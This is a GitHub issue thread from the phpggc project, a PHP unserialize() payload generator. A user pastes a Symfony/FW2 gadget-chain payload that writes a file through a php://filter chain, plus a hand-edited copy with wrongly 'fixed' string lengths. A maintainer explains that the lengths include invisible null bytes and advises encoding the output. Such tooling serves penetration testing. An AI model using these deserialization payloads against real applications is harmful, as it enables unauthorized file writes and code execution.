search

ambionics / phpggc

PHPGGC is a library of PHP unserialize() payloads along with a tool to generate them, from command line or programmatically.
https://ambionics.io/blog
Apache License 2.0
3.25k stars 502 forks source link

wrong string len in serialized payloads #149

Closed box4444 closed 1 year ago

box4444 commented 1 year ago

hello i generated a payload with this command phpggc Symfony/FW2 /tmp/test123.txt /tmp/dsdsdsdsdsds

output playload is: 'O:55:"Symfony\Bridge\PhpUnit\Legacy\SymfonyTestsListenerTrait":11:{s:62:"Symfony\Bridge\PhpUnit\Legacy\SymfonyTestsListenerTraitstate";i:1;s:68:"Symfony\Bridge\PhpUnit\Legacy\SymfonyTestsListenerTraitskippedFile";s:60:"php://filter/convert.base64-decode/resource=/tmp/test123.txt";s:67:"Symfony\Bridge\PhpUnit\Legacy\SymfonyTestsListenerTraitwasSkipped";a:0:{}s:66:"Symfony\Bridge\PhpUnit\Legacy\SymfonyTestsListenerTraitisSkipped";s:79:"aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaYWRhZGFkZGRkZGRkZGQK";s:77:"Symfony\Bridge\PhpUnit\Legacy\SymfonyTestsListenerTraitexpectedDeprecations";a:0:{}s:77:"Symfony\Bridge\PhpUnit\Legacy\SymfonyTestsListenerTraitgatheredDeprecations";a:0:{}s:77:"Symfony\Bridge\PhpUnit\Legacy\SymfonyTestsListenerTraitpreviousErrorHandler";N;s:74:"Symfony\Bridge\PhpUnit\Legacy\SymfonyTestsListenerTraittestsWithWarnings";N;s:75:"Symfony\Bridge\PhpUnit\Legacy\SymfonyTestsListenerTraitreportUselessTests";N;s:62:"Symfony\Bridge\PhpUnit\Legacy\SymfonyTestsListenerTraiterror";N;s:78:"Symfony\Bridge\PhpUnit\Legacy\SymfonyTestsListenerTraitrunsInSeparateProcess";b:0;}'

but string length are wrong. after manually correcting strings:

'O:55:"Symfony\Bridge\PhpUnit\Legacy\SymfonyTestsListenerTrait":11:{s:60:"Symfony\Bridge\PhpUnit\Legacy\SymfonyTestsListenerTraitstate";i:1;s:66:"Symfony\Bridge\PhpUnit\Legacy\SymfonyTestsListenerTraitskippedFile";s:60:"php://filter/convert.base64-decode/resource=/tmp/test123.txt";s:65:"Symfony\Bridge\PhpUnit\Legacy\SymfonyTestsListenerTraitwasSkipped";a:0:{}s:64:"Symfony\Bridge\PhpUnit\Legacy\SymfonyTestsListenerTraitisSkipped";s:79:"aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaYWRhZGFkZGRkZGRkZGQK";s:75:"Symfony\Bridge\PhpUnit\Legacy\SymfonyTestsListenerTraitexpectedDeprecations";a:0:{}s:75:"Symfony\Bridge\PhpUnit\Legacy\SymfonyTestsListenerTraitgatheredDeprecations";a:0:{}s:75:"Symfony\Bridge\PhpUnit\Legacy\SymfonyTestsListenerTraitpreviousErrorHandler";N;s:72:"Symfony\Bridge\PhpUnit\Legacy\SymfonyTestsListenerTraittestsWithWarnings";N;s:73:"Symfony\Bridge\PhpUnit\Legacy\SymfonyTestsListenerTraitreportUselessTests";N;s:60:"Symfony\Bridge\PhpUnit\Legacy\SymfonyTestsListenerTraiterror";N;s:76:"Symfony\Bridge\PhpUnit\Legacy\SymfonyTestsListenerTraitrunsInSeparateProcess";b:0;}'

after running payload i am receiving this error:

Object of class __PHP_Incomplete_Class could not be converted to string

nikaiw commented 1 year ago

Hello, Your attempt at "fixing strings" actually broke properties of the object preventing its deserialization by php. Those strings contains null bytes which is why they appears shorter to you, yet they have in fact the right length in the payload.

As stated in a previous issue #148 Payloads usually contains null bytes invisible to the naked eye. "Generally, you can't just copy paste your payload from the console. Either pipe it to base64, or (preferably) use the -b flag of phpggc to tell it to base64 encode it. You can also use -s to soft urlencode for instance, or use the ASCII armor, or chain encoders"

I would had that unless you are trying to exploit specific memory corruption bug in unserialize or/and know what you are doing it is not generally advisable to edit manually a serialized payload.